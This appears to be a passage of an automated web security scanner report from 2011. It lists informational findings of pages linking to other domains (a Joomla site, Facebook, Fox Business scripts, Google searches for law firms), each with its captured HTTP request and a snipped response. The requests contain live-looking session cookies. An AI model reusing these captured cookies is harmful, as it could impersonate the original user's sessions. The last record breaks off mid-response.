19.35. http://www.digiware.net/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.digiware.net
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.digiware.net/index.php?option=com_content&view=article&id=95&Itemid=0

The response contains the following links to other domains:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.condorlabs.net/

Request

GET /index.php?option=com_content&view=article&id=95&Itemid=0 HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
Referer: http://www.digiware.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: f165d946d0a4013e03ebd5d7edb21d2c=o3ue90qurns4h4i2cgin7c1vg1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9685

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<a href="/index.php?option=com_content&view=article&id=100&Itemid=149">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="950" height="196" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0">
<param name="src" value="/images/stories/bannerprovhome.swf" />
...[SNIP]...
<area shape="rect" coords="314,6,622,137" href="http://securelab.digiware.net/" target="_blank" />
<area shape="rect" coords="621,5,950,136" href="http://www.condorlabs.net/" target="_blank" />
</map>
...[SNIP]...

19.36. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Request

Response

19.37. http://www.foxbusiness.com/static/all/js/ad.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxbusiness.com
Path:	/static/all/js/ad.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.foxbusiness.com/static/all/js/ad.js?20110511

The response contains the following link to another domain:

http://www.google.com/

Request

GET /static/all/js/ad.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c34030-7ce9-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2723
Date: Thu, 12 May 2011 11:38:09 GMT
Connection: close
Content-Length: 31977

//Integration Services - v 0.99
var ad = {
   _tile: 0,
   ord: Math.floor(999999999*Math.random()),
dc: {
_svr: "http://ad.doubleclick.net",
_method: "adj",
       _url: "",
       _kw
...[SNIP]...
</scr"+ "ipt>";//document.write(\"<iframe src='http://www.google.com'></iframe>
...[SNIP]...

19.38. http://www.foxbusiness.com/static/all/js/head.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxbusiness.com
Path:	/static/all/js/head.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.foxbusiness.com/static/all/js/head.js?20110511

The response contains the following link to another domain:

http://www.foxnews.com/static/all/img/head/profile.png

Request

GET /static/all/js/head.js?20110511 HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 11 May 2011 18:05:08 GMT
ETag: "3c34019-75f8-e9b49d00"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=2820
Date: Thu, 12 May 2011 11:38:17 GMT
Connection: close
Content-Length: 30200

/***** Header Script *****//*
Updated: 1/31/2011
Header script functions

To search for a specific prototype, search the keyword:
- Authentication: fn.authentication
- Weather Section: fn.weather
- O
...[SNIP]...
omain); } catch(err) { showToConsole("[head.authentication] Logout - An error occured: " + err); }
                               return false;
                           });
                           $(this).html(logoutLink);
                       });

                       usrElm.html('<img src="http://www.foxnews.com/static/all/img/head/profile.png" alt="" /> ' + as.getDisplayName());
                       usrElm.css({ display:"inline" });
                   } else {
                       auth = accntElm.find(".user-options >
...[SNIP]...

19.39. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rm7jdniJ0TsJ:www.technologylawsource.com/+Porter+Wright+Morris+%26+Arthur&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.bakerlaw.com/
http://www.bankingandfinancelawreport.com/promo/about/
http://www.bricker.com/
http://www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm
http://www.nanolawreport.com/
http://www.porterwright.com/
http://www.porterwright.com/attorneys/
http://www.porterwright.com/careers/
http://www.porterwright.com/client_login/
http://www.porterwright.com/contactus/
http://www.porterwright.com/firm/
http://www.porterwright.com/people/
http://www.porterwright.com/resources/
http://www.secactions.com/pdf/Gorman.pdf
http://www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html
http://www.szd.com/
http://www.technologylawsource.com/
http://www.vorys.com/
http://www.youtube.com/results?q=Porter+Wright+Morris+%26+Arthur&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Porter+Wright+Morris+%26+Arthur&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:20 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78506

<!doctype html> <head> <title>Porter Wright Morris & Arthur - Google Search</title> <script>window.google={kEI:"wNDLTcyvKqby0gGL0Yj6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,2850
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Porter+Wright+Morris+%26+Arthur&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBoQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:O7uqHMn85WEJ:www.porterwright.com/+Porter+Wright+Morris+%26+Arthur&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/people/" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoADAA')">People</a></div><div class=sld><a class=sla href="http://www.porterwright.com/contactus/" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/careers/" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoAjAA')">Careers</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.porterwright.com/firm/" onmousedown="return clk(this.href,'','','','1','','0CCQQqwMoAzAA')">Firm</a></div><div class=sld><a class=sla href="http://www.porterwright.com/resources/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoBDAA')">Resources</a></div><div class=sld><a class=sla href="http://www.porterwright.com/client_login/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoBTAA')">Client Login</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/attorneys/" class=l onmousedown="return clk(this.href,'','','','3','','0CDEQFjAC')">Attorneys | Careers | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:NPW95tOVoTgJ:www.porterwright.com/attorneys/+Porter+Wright+Morris+%26+Arthur&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CDYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/firm/" class=l onmousedown="return clk(this.href,'','','','4','','0CDgQFjAD')">Overview | Firm | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:OXHzbhblm7AJ:www.porterwright.com/firm/+Porter+Wright+Morris+%26+Arthur&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','4','','0CD0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.porterwright.com/people/" class=l onmousedown="return clk(this.href,'','','','5','','0CD8QFjAE')">Search | People | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:UDZGz-CIJ-YJ:www.porterwright.com/people/+Porter+Wright+Morris+%26+Arthur&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CEQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm" class=l onmousedown="return clk(this.href,'','','','6','','0CEcQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:E8yBb_JYd0IJ:www.martindale.com/Porter-Wright-Morris-Arthur-LLP/1449367-law-firm-office.htm+Porter+Wright+Morris+%26+Arthur&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','6','','0CEwQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html" class=l onmousedown="return clk(this.href,'','','','7','','0CE8QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:HcxPM-nC9vwJ:www.superlawyers.com/ohio/lawfirm/Porter-Wright-Morris-and-Arthur-LLP/02f0588e-0308-4b59-9d7d-ba680399c24a.html+Porter+Wright+Morris+%26+Arthur&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CFQQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.secactions.com/pdf/Gorman.pdf" class=l onmousedown="return clk(this.href,'','','','8','','0CFYQFjAH')">Thomas O. Gorman <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bankingandfinancelawreport.com/promo/about/" class=l onmousedown="return clk(this.href,'','','','9','','0CF0QFjAI')">About <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:hbsgofw8S-oJ:www.bankingandfinancelawreport.com/promo/about/+Porter+Wright+Morris+%26+Arthur&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CGIQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nanolawreport.com/" class=l onmousedown="return clk(this.href,'','','','10','','0CGMQFjAJ')">Nanotechnology Lawyer & Attorney : <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:sk5WCgVEDQQJ:www.nanolawreport.com/+Porter+Wright+Morris+%26+Arthur&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CGgQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.technologylawsource.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CGoQFjAK')">Technology Law Source : Technology Lawyers & Attorneys for Patents <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rm7jdniJ0TsJ:www.technologylawsource.com/+Porter+Wright+Morris+%26+Arthur&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:rm7jdniJ0TsJ:www.technologylawsource.com/+Porter+Wright+Morris+%26+Arthur&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','11','','0CG8QIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.vorys.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHIQoggwCw')">Vorys, Sater, Seymour and Pease LLP</a>
...[SNIP]...
<div><a href="http://www.szd.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHQQoggwDA')">Schottenstein Zox & Dunn</a>
...[SNIP]...
<div><a href="http://www.bricker.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHYQoggwDQ')">of the Bricker</a>
...[SNIP]...
<div><a href="http://www.bakerlaw.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHgQoggwDg')">Baker Hostetler</a>
...[SNIP]...

19.40. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Berger+Kahn&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner
http://webcache.googleusercontent.com/search?q=cache:06qQP7B8JIQJ:www.handtherapyspecialists.com/dir.html+Berger+Kahn&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:6at9UuASthwJ:www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html+Berger+Kahn&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:A2xkTFBWW8IJ:www.bergerkahn.com/offices.php+Berger+Kahn&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:E5bjf_XLSEAJ:www.bergerkahn.com/attorneys.php+Berger+Kahn&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:I8ZD_pN5fa8J:www.elawmarketing.com/portfolio/email-marketing/berger-kahn+Berger+Kahn&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:IRcsuJBFBEkJ:www.bergerkahn.com/attorneys.php/26+Berger+Kahn&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:R-thpFnCxOoJ:www.linkedin.com/company/berger-kahn+Berger+Kahn&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:fhFNFNDl3JMJ:www.bergerkahn.com/+Berger+Kahn&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:kmG0fs1pitcJ:articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner+Berger+Kahn&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ywzG_JPWTMMJ:www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx+Berger+Kahn&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.bergerkahn.com/
http://www.bergerkahn.com/attorneys.php
http://www.bergerkahn.com/attorneys.php/26
http://www.bergerkahn.com/contact.php
http://www.bergerkahn.com/offices.php
http://www.elawmarketing.com/portfolio/email-marketing/berger-kahn
http://www.gladstonemichel.com/
http://www.handtherapyspecialists.com/dir.html
http://www.helmerfriedman.com/
http://www.legallynanny.com/
http://www.lexisnexis.com/community/litigationresourcecenter/blogs/peopleinthenews/archive/2009/08/18/berger-kahn-la-is-now-gladstone-michel-weisberg-willner-_2600_-sloane.aspx
http://www.linkedin.com/company/berger-kahn
http://www.robodocs.com/
http://www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html
http://www.youtube.com/results?q=Berger+Kahn&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Berger+Kahn&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:16:12 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 68673

<!doctype html> <head> <title>Berger Kahn - Google Search</title> <script>window.google={kEI:"jM_LTf6UA6e30gG5rJnFBg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,29795,29
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Berger+Kahn&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:fhFNFNDl3JMJ:www.bergerkahn.com/+Berger+Kahn&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.bergerkahn.com/attorneys.php" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.bergerkahn.com/offices.php" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoATAA')">Offices</a></div><div class=sld><a class=sla href="http://www.bergerkahn.com/contact.php" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAjAA')">Contact Us</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/attorneys.php" class=l onmousedown="return clk(this.href,'','','','2','','0CCIQFjAB')">Attorneys ... <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:E5bjf_XLSEAJ:www.bergerkahn.com/attorneys.php+Berger+Kahn&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/offices.php" class=l onmousedown="return clk(this.href,'','','','3','','0CCkQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:A2xkTFBWW8IJ:www.bergerkahn.com/offices.php+Berger+Kahn&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CC4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bergerkahn.com/attorneys.php/26" class=l onmousedown="return clk(this.href,'','','','4','','0CDAQFjAD')">David B. Ezra ... Attorneys ... <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IRcsuJBFBEkJ:www.bergerkahn.com/attorneys.php/26+Berger+Kahn&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDUQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/berger-kahn" class=l onmousedown="return clk(this.href,'','','','5','','0CDgQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:R-thpFnCxOoJ:www.linkedin.com/company/berger-kahn+Berger+Kahn&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CD0QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elawmarketing.com/portfolio/email-marketing/berger-kahn" class=l onmousedown="return clk(this.href,'','','','6','','0CD4QFjAF')">Key Decisions email newsletter from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:I8ZD_pN5fa8J:www.elawmarketing.com/portfolio/email-marketing/berger-kahn+Berger+Kahn&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html" class=l onmousedown="return clk(this.href,'','','','7','','0CEQQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6at9UuASthwJ:www.superlawyers.com/california-southern/lawfirm/Berger-Kahn-A-Law-Corporation/7fc90852-db7f-4cbb-8318-0fb4894afbc9.html+Berger+Kahn&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.handtherapyspecialists.com/dir.html" class=l onmousedown="return clk(this.href,'','','','8','','0CEoQFjAH')">Fran <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:06qQP7B8JIQJ:www.handtherapyspecialists.com/dir.html+Berger+Kahn&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CE8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://articles.latimes.com/1993-07-04/business/fi-10159_1_managing-partner" class=l onmousedown="return clk(this.href,'','','','9','','0CFEQFjAI')"><em>
